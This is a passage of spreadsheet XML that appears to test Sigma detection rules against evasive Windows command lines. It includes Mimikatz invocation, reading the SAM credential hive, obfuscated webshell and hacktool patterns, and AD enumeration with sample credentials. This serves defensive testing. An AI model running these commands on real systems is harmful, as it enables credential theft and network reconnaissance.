      <c r="H1849" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1849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49" s="43" t="n"/>
      <c r="K1849" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1850" ht="15.75" customHeight="1" s="42">
      <c r="A1850" s="43" t="inlineStr">
        <is>
          <t>t1482</t>
        </is>
      </c>
      <c r="B1850" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1850" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1850" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1850" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass /"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1850" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1850" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1850" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1850" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc); Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc)</t>
        </is>
      </c>
      <c r="J1850" s="43" t="n"/>
      <c r="K1850" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1851" ht="15.75" customHeight="1" s="42">
      <c r="A1851" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1851" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1851" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1851" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1851" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1851" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1851" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1851" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1851" s="43" t="n"/>
      <c r="J1851" s="43" t="n"/>
      <c r="K1851" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1852" ht="15.75" customHeight="1" s="42">
      <c r="A1852" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1852" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C1852" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D1852" s="43" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E1852" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'"</t>
        </is>
      </c>
      <c r="F1852" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1852" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1852" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1852" s="43" t="n"/>
      <c r="J1852" s="43" t="n"/>
      <c r="K1852" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1853" ht="15.75" customHeight="1" s="42">
      <c r="A1853" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1853" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C1853" s="43" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D1853" s="43" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E1853" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-Item -Path 'HKCU:\Software' | Export-Clixml -Path 'C:\temp\export.xml'"</t>
        </is>
      </c>
      <c r="F1853" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1853" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1853" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1853" s="43" t="n"/>
      <c r="J1853" s="43" t="n"/>
      <c r="K1853" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1854" ht="15.75" customHeight="1" s="42">
      <c r="A1854" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1854" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C1854" s="43" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D1854" s="43" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E1854" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp; ipconfig &amp; echo"</t>
        </is>
      </c>
      <c r="F1854" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1854" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1854" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1854" s="43" t="n"/>
      <c r="J1854" s="43" t="n"/>
      <c r="K1854" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1855" ht="15.75" customHeight="1" s="42">
      <c r="A1855" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1855" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C1855" s="43" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D1855" s="43" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E1855" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp;dir&amp;&amp;echo [E]"</t>
        </is>
      </c>
      <c r="F1855" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1855" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1855" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1855" s="43" t="n"/>
      <c r="J1855" s="43" t="n"/>
      <c r="K1855" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1856" ht="15.75" customHeight="1" s="42">
      <c r="A1856" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1856" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C1856" s="43" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D1856" s="43" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E1856" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp;wh^oami&amp;echo"</t>
        </is>
      </c>
      <c r="F1856" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1856" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1856" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1856" s="43" t="n"/>
      <c r="J1856" s="43" t="n"/>
      <c r="K1856" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1857" ht="15.75" customHeight="1" s="42">
      <c r="A1857" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1857" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_adfind</t>
        </is>
      </c>
      <c r="C1857" s="43" t="inlineStr">
        <is>
          <t>Renamed AdFind Execution</t>
        </is>
      </c>
      <c r="D1857" s="43" t="inlineStr">
        <is>
          <t>df55196f-f105-44d3-a675-e9dfb6cc2f2b</t>
        </is>
      </c>
      <c r="E1857" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\AtomicRedTeam\atomics\..\ExternalPayloads\AdFind.exe" -f object^category=subnet</t>
        </is>
      </c>
      <c r="F1857" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1857" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1857" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1857" s="43" t="n"/>
      <c r="J1857" s="43" t="n"/>
      <c r="K1857" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1858" ht="15.75" customHeight="1" s="42">
      <c r="A1858" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1858" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_adfind</t>
        </is>
      </c>
      <c r="C1858" s="43" t="inlineStr">
        <is>
          <t>Renamed AdFind Execution</t>
        </is>
      </c>
      <c r="D1858" s="43" t="inlineStr">
        <is>
          <t>df55196f-f105-44d3-a675-e9dfb6cc2f2b</t>
        </is>
      </c>
      <c r="E1858" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c "C:\AtomicRedTeam\atomics\..\ExternalPayloads\AdFind.exe" -sc trust""dmp</t>
        </is>
      </c>
      <c r="F1858" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1858" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1858" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1858" s="43" t="n"/>
      <c r="J1858" s="43" t="n"/>
      <c r="K1858" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1859" ht="15.75" customHeight="1" s="42">
      <c r="A1859" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1859" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C1859" s="43" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D1859" s="43" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E1859" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp;wh^oami&amp;ec^ho"</t>
        </is>
      </c>
      <c r="F1859" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1859" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1859" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1859" s="43" t="n"/>
      <c r="J1859" s="43" t="n"/>
      <c r="K1859" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1860" ht="15.75" customHeight="1" s="42">
      <c r="A1860" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1860" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1860" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1860" s="43" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1860" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-CimInstance -ClassName Win32_UserAccount"</t>
        </is>
      </c>
      <c r="F1860" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1860" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1860" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1860" s="43" t="n"/>
      <c r="J1860" s="43" t="n"/>
      <c r="K1860" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1861" ht="15.75" customHeight="1" s="42">
      <c r="A1861" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1861" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1861" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1861" s="43" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1861" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" /c "type C:\Windows\System32\config\SAM"</t>
        </is>
      </c>
      <c r="F1861" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1861" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1861" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1861" s="43" t="n"/>
      <c r="J1861" s="43" t="n"/>
      <c r="K1861" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1862" ht="15.75" customHeight="1" s="42">
      <c r="A1862" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1862" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1862" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1862" s="43" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1862" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" /C "type C:\Windows\System32\config\SAM"</t>
        </is>
      </c>
      <c r="F1862" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1862" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1862" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1862" s="43" t="n"/>
      <c r="J1862" s="43" t="n"/>
      <c r="K1862" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1863" ht="15.75" customHeight="1" s="42">
      <c r="A1863" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1863" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_all_execution</t>
        </is>
      </c>
      <c r="C1863" s="43" t="inlineStr">
        <is>
          <t>Enumerate All Information With Whoami.EXE</t>
        </is>
      </c>
      <c r="D1863" s="43" t="inlineStr">
        <is>
          <t>c248c896-e412-4279-8c15-1c558067b6fa</t>
        </is>
      </c>
      <c r="E1863" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[Security.Principal.WindowsIdentity]::GetCurrent().Groups | ForEach-Object { $_.Translate([System.Security.Principal.NTAccount]) }"</t>
        </is>
      </c>
      <c r="F1863" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1863" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1863" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1863" s="43" t="n"/>
      <c r="J1863" s="43" t="n"/>
      <c r="K1863" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1864" ht="15.75" customHeight="1" s="42">
      <c r="A1864" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1864" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_all_execution</t>
        </is>
      </c>
      <c r="C1864" s="43" t="inlineStr">
        <is>
          <t>Enumerate All Information With Whoami.EXE</t>
        </is>
      </c>
      <c r="D1864" s="43" t="inlineStr">
        <is>
          <t>c248c896-e412-4279-8c15-1c558067b6fa</t>
        </is>
      </c>
      <c r="E1864" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Security.Principal.WindowsIdentity]::GetCurrent().Groups | ForEach-Object { $_.Translate([System.Security.Principal.NTAccount]) }"</t>
        </is>
      </c>
      <c r="F1864" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1864" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1864" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1864" s="43" t="n"/>
      <c r="J1864" s="43" t="n"/>
      <c r="K1864" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1865" ht="15.75" customHeight="1" s="42">
      <c r="A1865" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1865" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1865" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1865" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1865" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F1865" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1865" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1865" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1865" s="43" t="n"/>
      <c r="J1865" s="43" t="n"/>
      <c r="K1865" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1866" ht="15.75" customHeight="1" s="42">
      <c r="A1866" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B1866" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_susp_execution</t>
        </is>
      </c>
      <c r="C1866" s="43" t="inlineStr">
        <is>
          <t>Suspicious Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D1866" s="43" t="inlineStr">
        <is>
          <t>ef61af62-bc74-4f58-b49b-626448227652</t>
        </is>
      </c>
      <c r="E1866" s="43" t="inlineStr">
        <is>
          <t>cmd /c "copy C:\Tools\ADExplorer64.exe C:\Windows\System32\sysinfo.exe &amp;&amp; C:\Windows\System32\sysinfo.exe -snapshot C:\PerfLogs\ad.db"</t>
        </is>
      </c>
      <c r="F1866" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1866" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1866" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1866" s="43" t="n"/>
      <c r="J1866" s="43" t="n"/>
      <c r="K1866" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1867" ht="15.75" customHeight="1" s="42">
      <c r="A1867" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B1867" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_susp_execution</t>
        </is>
      </c>
      <c r="C1867" s="43" t="inlineStr">
        <is>
          <t>Suspicious Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D1867" s="43" t="inlineStr">
        <is>
          <t>ef61af62-bc74-4f58-b49b-626448227652</t>
        </is>
      </c>
      <c r="E1867" s="43" t="inlineStr">
        <is>
          <t>cmd /C "copy C:\Tools\ADExplorer64.exe C:\Windows\System32\sysinfo.exe &amp;&amp; C:\Windows\System32\sysinfo.exe -snapshot C:\PerfLogs\ad.db"</t>
        </is>
      </c>
      <c r="F1867" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1867" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1867" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1867" s="43" t="n"/>
      <c r="J1867" s="43" t="n"/>
      <c r="K1867" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1868" ht="15.75" customHeight="1" s="42">
      <c r="A1868" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1868" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dtrace_kernel_dump</t>
        </is>
      </c>
      <c r="C1868" s="43" t="inlineStr">
        <is>
          <t>Suspicious Kernel Dump Using Dtrace</t>
        </is>
      </c>
      <c r="D1868" s="43" t="inlineStr">
        <is>
          <t>7124aebe-4cd7-4ccb-8df0-6d6b93c96795</t>
        </is>
      </c>
      <c r="E1868" s="43" t="inlineStr">
        <is>
          <t>dtrace.exe -w "syscall:::return {lkd(0x0); exit(0);}"</t>
        </is>
      </c>
      <c r="F1868" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1868" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1868" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1868" s="43" t="n"/>
      <c r="J1868" s="43" t="n"/>
      <c r="K1868" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1869" ht="15.75" customHeight="1" s="42">
      <c r="A1869" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1869" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dtrace_kernel_dump</t>
        </is>
      </c>
      <c r="C1869" s="43" t="inlineStr">
        <is>
          <t>Suspicious Kernel Dump Using Dtrace</t>
        </is>
      </c>
      <c r="D1869" s="43" t="inlineStr">
        <is>
          <t>7124aebe-4cd7-4ccb-8df0-6d6b93c96795</t>
        </is>
      </c>
      <c r="E1869" s="43" t="inlineStr">
        <is>
          <t>dtrace.exe -w "syscall:::return {lkd( 0 ); exit(0);}"</t>
        </is>
      </c>
      <c r="F1869" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1869" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1869" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1869" s="43" t="n"/>
      <c r="J1869" s="43" t="n"/>
      <c r="K1869" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1870" ht="15.75" customHeight="1" s="42">
      <c r="A1870" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1870" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_soaphound_execution</t>
        </is>
      </c>
      <c r="C1870" s="43" t="inlineStr">
        <is>
          <t>HackTool - SOAPHound Execution</t>
        </is>
      </c>
      <c r="D1870" s="43" t="inlineStr">
        <is>
          <t>e92a4287-e072-4a40-9739-370c106bb750</t>
        </is>
      </c>
      <c r="E1870" s="43" t="inlineStr">
        <is>
          <t>"C:\AtomicRedTeam\atomics\T1059.001_x0008_in\SOAPHound.exe" --user thaim THAIMX --password P@ssword1 --dc 10.0.1.14 --buildcache  -c c:	emp\cache.txt</t>
        </is>
      </c>
      <c r="F1870" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1870" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1870" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1870" s="43" t="n"/>
      <c r="J1870" s="43" t="n"/>
      <c r="K1870" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1871" ht="15.75" customHeight="1" s="42">
      <c r="A1871" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1871" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_soaphound_execution</t>
        </is>
      </c>
      <c r="C1871" s="43" t="inlineStr">
        <is>
          <t>HackTool - SOAPHound Execution</t>
        </is>
      </c>
      <c r="D1871" s="43" t="inlineStr">
        <is>
          <t>e92a4287-e072-4a40-9739-370c106bb750</t>
        </is>
      </c>
      <c r="E1871" s="43" t="inlineStr">
        <is>
          <t>"C:\AtomicRedTeam\atomics\T1059.001_x0008_in\SOAPHound.exe" --user thaim --password P@ssword1 --domain THAIMX --dc 10.0.1.14 --bhdump --cachefilename=c:	emp\cache.txt --outputdirectory=c:	emp	est2</t>
        </is>
      </c>
      <c r="F1871" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1871" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1871" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1871" s="43" t="n"/>
      <c r="J1871" s="43" t="n"/>
      <c r="K1871" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1872" ht="15.75" customHeight="1" s="42">
      <c r="A1872" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1872" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_localgroup_member_recon</t>
        </is>
      </c>
      <c r="C1872" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet</t>
        </is>
      </c>
      <c r="D1872" s="43" t="inlineStr">
        <is>
          <t>c8a180d6-47a3-4345-a609-53f9c3d834fc</t>
        </is>
      </c>
      <c r="E1872" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" QUdULUxvY2FsR3JvdXBtZW50IC1Hcm91cCAiRG9tYWluIEFkbWlucyI=</t>
        </is>
      </c>
      <c r="F1872" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1872" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1872" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1872" s="43" t="n"/>
      <c r="J1872" s="43" t="n"/>
      <c r="K1872" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1873" ht="15.75" customHeight="1" s="42">
      <c r="A1873" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1873" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_sysmon_discovery_via_default_altitude</t>
        </is>
      </c>
      <c r="C1873" s="43" t="inlineStr">
        <is>
          <t>Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE</t>
        </is>
      </c>
      <c r="D1873" s="43" t="inlineStr">
        <is>
          <t>37db85d1-b089-490a-a59a-c7b6f984f480</t>
        </is>
      </c>
      <c r="E1873" s="43" t="inlineStr">
        <is>
          <t>fltmc.exe | Select-String "385201"</t>
        </is>
      </c>
      <c r="F1873" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1873" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1873" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1873" s="43" t="n"/>
      <c r="J1873" s="43" t="n"/>
      <c r="K1873" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1874" ht="15.75" customHeight="1" s="42">
      <c r="A1874" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1874" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_command</t>
        </is>
      </c>
      <c r="C1874" s="43" t="inlineStr">
        <is>
          <t>Suspicious Network Command</t>
        </is>
      </c>
      <c r="D1874" s="43" t="inlineStr">
        <is>
          <t>a29c1813-ab1f-4dde-b489-330b952e91ae</t>
        </is>
      </c>
      <c r="E1874" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c "netsh" "interface" "show" "interface"</t>
        </is>
      </c>
      <c r="F1874" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1874" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1874" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1874" s="43" t="n"/>
      <c r="J1874" s="43" t="n"/>
      <c r="K1874" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1875" ht="15.75" customHeight="1" s="42">
      <c r="A1875" s="43" t="inlineStr">
        <is>
          <t>t1057</t>
        </is>
      </c>
      <c r="B1875" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_pipe_output</t>
        </is>
      </c>
      <c r="C1875" s="43" t="inlineStr">
        <is>
          <t>Recon Command Output Piped To Findstr.EXE</t>
        </is>
      </c>
      <c r="D1875" s="43" t="inlineStr">
        <is>
          <t>ccb5742c-c248-4982-8c5c-5571b9275ad3</t>
        </is>
      </c>
      <c r="E1875" s="43" t="inlineStr">
        <is>
          <t>cmd /c "tasklist &gt; %temp%	.txt &amp;&amp; findstr powershell %temp%	.txt"</t>
        </is>
      </c>
      <c r="F1875" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1875" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1875" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1875" s="43" t="n"/>
      <c r="J1875" s="43" t="n"/>
      <c r="K1875" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1876" ht="15.75" customHeight="1" s="42">
      <c r="A1876" s="43" t="inlineStr">
        <is>
          <t>t1057</t>
        </is>
      </c>
      <c r="B1876" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_pipe_output</t>
        </is>
      </c>
      <c r="C1876" s="43" t="inlineStr">
        <is>
          <t>Recon Command Output Piped To Findstr.EXE</t>
        </is>
      </c>
      <c r="D1876" s="43" t="inlineStr">
        <is>
          <t>ccb5742c-c248-4982-8c5c-5571b9275ad3</t>
        </is>
      </c>
      <c r="E1876" s="43" t="inlineStr">
        <is>
          <t>cmd /c "tasklist |; findstr powershell"</t>
        </is>
      </c>
      <c r="F1876" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1876" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1876" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1876" s="43" t="n"/>
      <c r="J1876" s="43" t="n"/>
      <c r="K1876" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1877" ht="15.75" customHeight="1" s="42">
      <c r="A1877" s="43" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B1877" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_adfind_enumeration</t>
        </is>
      </c>
      <c r="C1877" s="43" t="inlineStr">
        <is>
